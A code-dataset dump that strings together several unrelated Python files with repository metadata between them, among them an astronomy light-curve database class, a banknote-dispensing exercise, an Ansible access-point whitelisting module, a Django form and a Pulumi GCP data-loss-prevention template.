from ramjet.photometric_database.standard_and_injected_light_curve_database import \
StandardAndInjectedLightCurveDatabase, OutOfBoundsInjectionHandlingMethod, BaselineFluxEstimationMethod
class MoaSurveyNoneSingleAndBinaryDatabase(StandardAndInjectedLightCurveDatabase):
"""
A class for a database of MOA light curves including non-microlensing, single lensing, and binary lensing
collections.
"""
moa_data_interface = MoaDataInterface()
def __init__(self):
super().__init__()
self.number_of_label_values = 1
self.number_of_parallel_processes_per_map = 5
self.time_steps_per_example = 18000
self.out_of_bounds_injection_handling = OutOfBoundsInjectionHandlingMethod.RANDOM_INJECTION_LOCATION
self.baseline_flux_estimation_method = BaselineFluxEstimationMethod.MEDIAN_ABSOLUTE_DEVIATION
self.shuffle_buffer_size = 1000
self.include_time_as_channel = True
# self.include_flux_errors_as_channel = True
negative_training = MoaSurveyLightCurveCollection(
survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string], label=0,
dataset_splits=list(range(8)))
self.training_standard_light_curve_collections = [
negative_training,
MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
dataset_splits=list(range(8))),
MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
dataset_splits=list(range(8)))
]
# self.training_injectee_light_curve_collection = negative_training
# self.training_injectable_light_curve_collections = [
# # MicrolensingSyntheticGeneratedDuringRunningSignalCollection(),
# # MicrolensingSyntheticApproximatePsplGeneratedDuringRunningSignalCollection()
# MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
# dataset_splits=list(range(8))),
# MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
# dataset_splits=list(range(8)))
# ]
self.validation_standard_light_curve_collections = [
MoaSurveyLightCurveCollection(survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string],
label=0, dataset_splits=[8]),
MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
dataset_splits=[8]),
MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
dataset_splits=[8])
]
self.inference_light_curve_collections = [
MoaSurveyLightCurveCollection(survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string],
label=0, dataset_splits=[9]),
MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
dataset_splits=[9]),
MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
dataset_splits=[9])
]
| 2,890 | 0 | 27 |
f0162ff4ea770a97740eab3aed1b1f3a2c45254f | 1,576 | py | Python | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | valor = str(input('Valor para saque: ').strip())
last = valor[len(valor) - 1]
valor = int(valor)
if last == '1':
valor += 1
print(f'o valor precisou ser corrigido para R${valor},00 pois não há notas de R$ 1,00 disponíveis')
print()
tot100 = tot50 = tot20 = tot10 = tot5 = tot2 = 0
while True:
if valor // 100 > 0:
tot100 += 1
valor -= 100
elif valor // 50 > 0:
tot50 += 1
valor -= 50
elif valor // 20 > 0:
tot20 += 1
valor -= 20
elif valor // 10 > 0:
tot10 += 1
valor -= 10
elif valor // 5 > 0 and ((valor % 2) == 1):
tot5 += 1
valor -= 5
elif valor // 2 > 0 and ((valor % 2) == 0):
tot2 += 1
valor -= 2
else:
break
if tot100 > 0:
if tot100 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot100} {A} de R$ 100,00')
if tot50 > 0:
if tot50 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot50} {A} de R$ 50,00')
if tot20 > 0:
if tot20 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot20} {A} de R$ 20,00')
if tot10 > 0:
if tot10 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot10} {A} de R$ 10,00')
if tot5 > 0:
if tot5 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot5} {A} de R$ 5,00')
if tot2 > 0:
if tot2 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot2} {A} de R$ 2,00')
print()
| 19.7 | 104 | 0.425127 | valor = str(input('Valor para saque: ').strip())
last = valor[len(valor) - 1]
valor = int(valor)
if last == '1':
valor += 1
print(f'o valor precisou ser corrigido para R${valor},00 pois não há notas de R$ 1,00 disponíveis')
print()
tot100 = tot50 = tot20 = tot10 = tot5 = tot2 = 0
while True:
if valor // 100 > 0:
tot100 += 1
valor -= 100
elif valor // 50 > 0:
tot50 += 1
valor -= 50
elif valor // 20 > 0:
tot20 += 1
valor -= 20
elif valor // 10 > 0:
tot10 += 1
valor -= 10
elif valor // 5 > 0 and ((valor % 2) == 1):
tot5 += 1
valor -= 5
elif valor // 2 > 0 and ((valor % 2) == 0):
tot2 += 1
valor -= 2
else:
break
if tot100 > 0:
if tot100 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot100} {A} de R$ 100,00')
if tot50 > 0:
if tot50 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot50} {A} de R$ 50,00')
if tot20 > 0:
if tot20 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot20} {A} de R$ 20,00')
if tot10 > 0:
if tot10 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot10} {A} de R$ 10,00')
if tot5 > 0:
if tot5 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot5} {A} de R$ 5,00')
if tot2 > 0:
if tot2 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot2} {A} de R$ 2,00')
print()
| 0 | 0 | 0 |
cfea1adda1cef4fa8dfdce519ed08e934086381e | 4,414 | py | Python | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-07-20T15:51:45.000Z | 2022-02-22T12:23:48.000Z | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-06-23T20:58:22.000Z | 2021-02-02T18:13:33.000Z | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-06-23T21:42:20.000Z | 2021-06-04T04:20:59.000Z |
#!/usr/bin/python3
'''
Module for Whitelisting Access Points
'''
# -*- coding: utf-8 -*-
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aos_cap_whitelist
version_added: 2.8.1
short_description: Whitelist Campus Access Points (CAP)
description: Module for whitelisting Campus Access Points on the controller under
the Mobility Master or a Standalone Controller
options:
action:
description:
- Type of action to be performed for whitelisting Campus Acess Points
require: true
choices:
- add
- delete
type: str
ap_name:
description:
- Name you would like to give to the the Access Point
required: false
type: str
ap_group:
description:
- Name of AP group where the Access Point needs to be added
required: false
type: str
mac_address:
description:
- MAC address of the Campus Access Point
required: true
type: str
description:
description:
- Short description for the Access Point
required: false
type: str
"""
EXAMPLES = """
#Usage Examples
- name: Whitelist an Access Point to default AP-Group
aos_cap_whitelist:
action: add
ap_name: test-ap-1
ap_group: default
mac_address: "ab:32:32:32:32:32"
description: Boston office, building 6, 2nd floor
- name: Whitelist an Access Point to configured AP-Group
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
action: delete
mac_address: "ab:32:32:32:32:32"
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.aos_http import AosApi
if __name__ == '__main__':
main()
| 31.084507 | 86 | 0.647938 |
#!/usr/bin/python3
'''
Module for Whitelisting Access Points
'''
# -*- coding: utf-8 -*-
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aos_cap_whitelist
version_added: 2.8.1
short_description: Whitelist Campus Access Points (CAP)
description: Module for whitelisting Campus Access Points on the controller under
the Mobility Master or a Standalone Controller
options:
action:
description:
- Type of action to be performed for whitelisting Campus Acess Points
require: true
choices:
- add
- delete
type: str
ap_name:
description:
- Name you would like to give to the the Access Point
required: false
type: str
ap_group:
description:
- Name of AP group where the Access Point needs to be added
required: false
type: str
mac_address:
description:
- MAC address of the Campus Access Point
required: true
type: str
description:
description:
- Short description for the Access Point
required: false
type: str
"""
EXAMPLES = """
#Usage Examples
- name: Whitelist an Access Point to default AP-Group
aos_cap_whitelist:
action: add
ap_name: test-ap-1
ap_group: default
mac_address: "ab:32:32:32:32:32"
description: Boston office, building 6, 2nd floor
- name: Whitelist an Access Point to configured AP-Group
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
action: delete
mac_address: "ab:32:32:32:32:32"
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.aos_http import AosApi
def main():
module = AnsibleModule(
argument_spec=dict(
action=dict(required=True, type='str', choices=['add', 'delete']),
ap_name=dict(required=False, type='str'),
ap_group=dict(required=False, type='str'),
mac_address=dict(required=True, type='str'),
description=dict(required=False, type='str')
))
action = module.params.get('action')
ap_name = module.params.get('ap_name')
ap_group = module.params.get('ap_group')
mac_address = module.params.get('mac_address')
description = module.params.get('description')
api = AosApi(module)
if action == 'add':
config_url = "/v1/configuration/object/wdb_cpsec_add_mac?"
data = {"description": description, "ap_name": ap_name, "ap_group": ap_group,
"name": str(mac_address)}
elif action == 'delete':
config_url = "/v1/configuration/object/wdb_cpsec_del_mac?"
data = {"name": str(mac_address)}
result, changed = api.post(url=config_url, data=data)
resp = result['resp']
if resp.has_key("_global_result") and resp["_global_result"]["status"] == 0:
module.exit_json(changed=changed, response=resp, response_code=result['code'])
else:
module.fail_json(changed=False, response=resp, response_code=result['code'],
msg=str(resp["_global_result"]["status_str"]))
if __name__ == '__main__':
main()
| 1,395 | 0 | 23 |
7da31b17c2cd6923e482d3e74dbd413d9877b147 | 1,488 | py | Python | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | 1 | 2015-03-12T23:51:10.000Z | 2015-03-12T23:51:10.000Z | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | null | null | null | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | null | null | null | from configuration import *
from features.base import BaseFeature, Feature, ConstantFeature
from utils import _pprint, get_single_column
from pandas import concat, DataFrame, Series, Index
import numpy as np
| 31 | 93 | 0.668011 | from configuration import *
from features.base import BaseFeature, Feature, ConstantFeature
from utils import _pprint, get_single_column
from pandas import concat, DataFrame, Series, Index
import numpy as np
def build_target(target, context):
y = target.create(context)
return get_single_column(y)
def build_feature_safe(feature, context):
d = feature.create(context)
# sanity check index is valid
assert not d.index - context.data.index
# columns probably shouldn't be constant...
if not isinstance(feature, ConstantFeature):
if any(d.std() < 1e-9):
print "\n\nWARNING: Feature '%s' has constant column. \n\n" % feature.unique_name
# we probably dont want NANs here...
if np.isnan(d.values).any():
# TODO HACK: this is not right. (why isn't it right???)
if not feature.unique_name.startswith(
Configuration.DEFAULT_PREDICTIONS_NAME):
print "\n\n***** WARNING: NAN in feature '%s' *****\n\n"%feature.unique_name
return d
def build_featureset(features, context):
# check for dupes
colnames = set([f.unique_name for f in features])
assert len(features) == len(colnames), "duplicate feature"
if not features:
return
x = []
for feature in features:
x.append(build_feature_safe(feature, context))
for d in x[1:]:
assert (d.index == x[0].index).all(), "Mismatched indices after feature creation"
return concat(x, axis=1)
| 1,206 | 0 | 69 |
9a22382029101b296f687c549cf395c5ad741718 | 497 | py | Python | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | 1 | 2021-07-07T14:18:29.000Z | 2021-07-07T14:18:29.000Z | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | null | null | null | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | null | null | null | # coding: utf-8
from django import forms
from .models import Transaction
from .models import Customer
| 27.611111 | 74 | 0.682093 | # coding: utf-8
from django import forms
from .models import Transaction
from .models import Customer
class TransactionForm(forms.ModelForm):
receiver = forms.ModelChoiceField(queryset=Transaction.objects.none())
def __init__(self, user, *args, **kwargs):
super(TransactionForm, self).__init__(*args, **kwargs)
self.fields['receiver'].queryset = Customer.objects.exclude(
user=user)
class Meta:
model = Transaction
exclude = ('giver', )
| 176 | 195 | 23 |
4e4b53e919c63e339641271dbfe16dbeb4021ed4 | 401 | py | Python | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/guikit | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | 3 | 2022-01-20T12:13:26.000Z | 2022-01-20T12:42:03.000Z | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/python-gui-template | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | 14 | 2021-09-21T15:19:36.000Z | 2021-11-28T00:05:32.000Z | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/guikit | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | null | null | null | import wx
from guikit.plugins import PluginBase, Tab
| 23.588235 | 60 | 0.57606 | import wx
from guikit.plugins import PluginBase, Tab
class NotebookPlugin(PluginBase):
def tabs(self, parent):
text1 = Tab(
page=wx.TextCtrl(parent, style=wx.TE_MULTILINE),
text="Text area",
)
text2 = Tab(
page=wx.TextCtrl(parent, style=wx.TE_MULTILINE),
text="A second text area",
)
return [text1, text2]
| 285 | 12 | 49 |
28738d283bf4868349454e25d748bec7dc9a9c6f | 33,650 | py | Python | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PreventionDeidentifyTemplateArgs', 'PreventionDeidentifyTemplate']
@pulumi.input_type
@pulumi.input_type
| 56.841216 | 422 | 0.624101 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PreventionDeidentifyTemplateArgs', 'PreventionDeidentifyTemplate']
@pulumi.input_type
class PreventionDeidentifyTemplateArgs:
def __init__(__self__, *,
deidentify_config: pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'],
parent: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a PreventionDeidentifyTemplate resource.
:param pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
"""
pulumi.set(__self__, "deidentify_config", deidentify_config)
pulumi.set(__self__, "parent", parent)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
@property
@pulumi.getter(name="deidentifyConfig")
def deidentify_config(self) -> pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']:
"""
Configuration of the deidentify template
Structure is documented below.
"""
return pulumi.get(self, "deidentify_config")
@deidentify_config.setter
def deidentify_config(self, value: pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']):
pulumi.set(self, "deidentify_config", value)
@property
@pulumi.getter
def parent(self) -> pulumi.Input[str]:
"""
The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: pulumi.Input[str]):
pulumi.set(self, "parent", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the template.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
User set display name of the template.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@pulumi.input_type
class _PreventionDeidentifyTemplateState:
def __init__(__self__, *,
deidentify_config: Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PreventionDeidentifyTemplate resources.
:param pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
:param pulumi.Input[str] name: Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
if deidentify_config is not None:
pulumi.set(__self__, "deidentify_config", deidentify_config)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if name is not None:
pulumi.set(__self__, "name", name)
if parent is not None:
pulumi.set(__self__, "parent", parent)
@property
@pulumi.getter(name="deidentifyConfig")
def deidentify_config(self) -> Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']]:
"""
Configuration of the deidentify template
Structure is documented below.
"""
return pulumi.get(self, "deidentify_config")
@deidentify_config.setter
def deidentify_config(self, value: Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']]):
pulumi.set(self, "deidentify_config", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the template.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
User set display name of the template.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parent(self) -> Optional[pulumi.Input[str]]:
"""
The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent", value)
class PreventionDeidentifyTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Allows creation of templates to de-identify content.
To get more information about DeidentifyTemplate, see:
* [API documentation](https://cloud.google.com/dlp/docs/reference/rest/v2/projects.deidentifyTemplates)
* How-to Guides
* [Official Documentation](https://cloud.google.com/dlp/docs/concepts-templates)
## Example Usage
### Dlp Deidentify Template Basic
```python
import pulumi
import pulumi_gcp as gcp
basic = gcp.dataloss.PreventionDeidentifyTemplate("basic",
deidentify_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigArgs(
info_type_transformations=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsArgs(
transformations=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="FIRST_NAME",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_with_info_type_config=True,
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="PHONE_NUMBER",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="AGE",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
integer_value=9,
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="EMAIL_ADDRESS",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="LAST_NAME",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
character_mask_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCharacterMaskConfigArgs(
characters_to_ignore=[{
"commonCharactersToIgnore": "PUNCTUATION",
}],
masking_character="X",
number_to_mask=4,
reverse_order=True,
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="DATE_OF_BIRTH",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
date_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueDateValueArgs(
day=1,
month=1,
year=2020,
),
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="CREDIT_CARD_NUMBER",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
crypto_deterministic_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigArgs(
context=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigContextArgs(
name="sometweak",
),
crypto_key=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyArgs(
transient=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyTransientArgs(
name="beep",
),
),
surrogate_info_type=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigSurrogateInfoTypeArgs(
name="abc",
),
),
),
),
],
),
),
description="Description",
display_name="Displayname",
parent="projects/my-project-name")
```
## Import
DeidentifyTemplate can be imported using any of these accepted formats
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/deidentifyTemplates/{{name}}
```
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/{{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PreventionDeidentifyTemplateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows creation of templates to de-identify content.
To get more information about DeidentifyTemplate, see:
* [API documentation](https://cloud.google.com/dlp/docs/reference/rest/v2/projects.deidentifyTemplates)
* How-to Guides
